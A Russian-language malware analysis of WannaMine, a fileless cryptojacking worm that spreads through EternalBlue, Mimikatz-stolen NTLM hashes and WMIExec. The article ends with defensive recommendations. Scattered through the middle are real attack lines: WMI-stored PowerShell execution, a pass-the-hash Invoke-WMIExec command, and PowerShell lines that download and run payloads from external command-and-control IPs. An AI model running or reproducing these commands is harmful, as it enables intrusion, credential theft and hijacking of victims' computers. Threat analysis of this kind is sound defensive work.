В мире вредоносного программного обеспечения постоянно появляются новые, всё более изощрённые угрозы. Одной из таких стал WannaMine - сложный файловый криптоджекинг-червь, который для своей работы почти не оставляет следов на диске. Вместо этого он использует технику «жизни за счёт земли» (living-off-the-land), эксплуатируя легитимные инструменты администрирования Windows, такие как PowerShell и Windows Management Instrumentation (WMI). Его главная цель - незаметно захватить вычислительные ресурсы заражённых компьютеров для майнинга криптовалюты Monero, что часто приводит к полной неработоспособности серверов и рабочих станций из-за экстремальной нагрузки на процессор.
Цикл заражения обычно начинается с фишингового письма, содержащего вредоносный batch-файл, или через эксплуатацию уязвимости EternalBlue (MS17-010) в незащищённых службах SMB (Server Message Block). После компрометации системы вредоносное ПО устанавливает механизм постоянства (persistence), создавая зловредные подписки на события WMI. Этот подход гарантирует, что код автоматически перезапустится даже после перезагрузки компьютера, не оставляя на диске привычных исполняемых файлов.
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System <TRUNCATED> $vbs = New-Object -ComObject WScript.Shell $vbs.run($cmdmon,0)
Для распространения по сети WannaMine использует многоэтапную стратегию латерального перемещения. Сначала он пытается похитить учётные данные пользователей, а именно NTLM-хэши, из памяти с помощью реализации инструмента Mimikatz на PowerShell. В случае успеха для удалённого выполнения команд на других устройствах в сети используется WMIExec. Если же кража учётных данных не удаётся, вредоносное ПО возвращается к эксплуатации уязвимости EternalBlue для атаки уязвимых машин. Таким образом, злоумышленники стремятся создать обширную бот-сеть для майнинга.
Invoke-WMIExec Target [IP] -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 <<command>>
wmic /NODE:"VIKAS-PC" /USER:"vikas.singh" PASSWORD:"MyPoorPassword" process call create "powershell.exe -Command {IEX (New-
ObjectNet.Webclient).DownloadString('http://[IP]/Payload.psl')}" Ключевой особенностью WannaMine является его модульная архитектура и почти полная зависимость от WMI для хранения и выполнения кода. После первоначального заражения вредоносное ПО определяет разрядность операционной системы и загружает соответствующий полезный модуль (payload) из удалённого сервера. Затем основные скрипты, включая модуль для кражи паролей (mimi), майнер (mon) и инструменты для распространения (funs), сохраняются непосредственно в свойствах базы данных WMI. Для автоматического запуска этих скриптов создаются подписки на системные события, что делает инфекцию чрезвычайно живучей.
powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://45.199.154[.]147:8000/in6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://45.199.154[.]147:8000/in3.ps1')}"
powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://19x.22.127[dot]15x:8000/info6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://19x.22.127[dot]15x:8000/info3.ps1')}" Механизмы латерального перемещения также демонстрируют высокую изощрённость. Для поиска целей WannaMine использует код, позаимствованный из сканера сетей PingCastle. Это позволяет ему составлять карту сети и находить кратчайший путь к машинам, уязвимым для атак через SMB. При наличии хэшей паролей привилегированных учётных записей, например, администратора домена, вредоносное ПО использует команды вроде Invoke-WMIExec для захвата новых узлов.
Добравшись до конечной цели, WannaMine настраивает систему для максимальной эффективности майнинга. Он изменяет настройки управления питанием, чтобы компьютер никогда не уходил в спящий режим. Кроме того, майнер активно устраняет конкурентов, сканируя и завершая процессы, связанные с другими криптоджекинг-программами, которые используют стандартные порты вроде 3333 или 7777. Собственный же майнер WannaMine работает на порту 14444.
C:\Windows\system32\powercfg.exe /CHANGE -standby-timeout-ac 0
Атаки подобного класса представляют серьёзную опасность для корпоративных сетей, поскольку сочетают в себе скрытность, живучесть и агрессивное распространение. Традиционные антивирусные решения, ориентированные на сканирование файлов, часто оказываются неэффективными против таких «бесфайловых» угроз. Специалисты по безопасности рекомендуют сосредоточиться на превентивных мерах: регулярном и срочном обновлении систем для закрытия известных уязвимостей вроде EternalBlue, ограничении использования мощных скриптовых средств вроде PowerShell в повседневной работе, а также на постоянном мониторинге сетевой активности и аномального потребления ресурсов центральным процессором. Понимание механизмов работы таких сложных угроз, как WannaMine, является критически важным шагом для построения эффективной защиты.
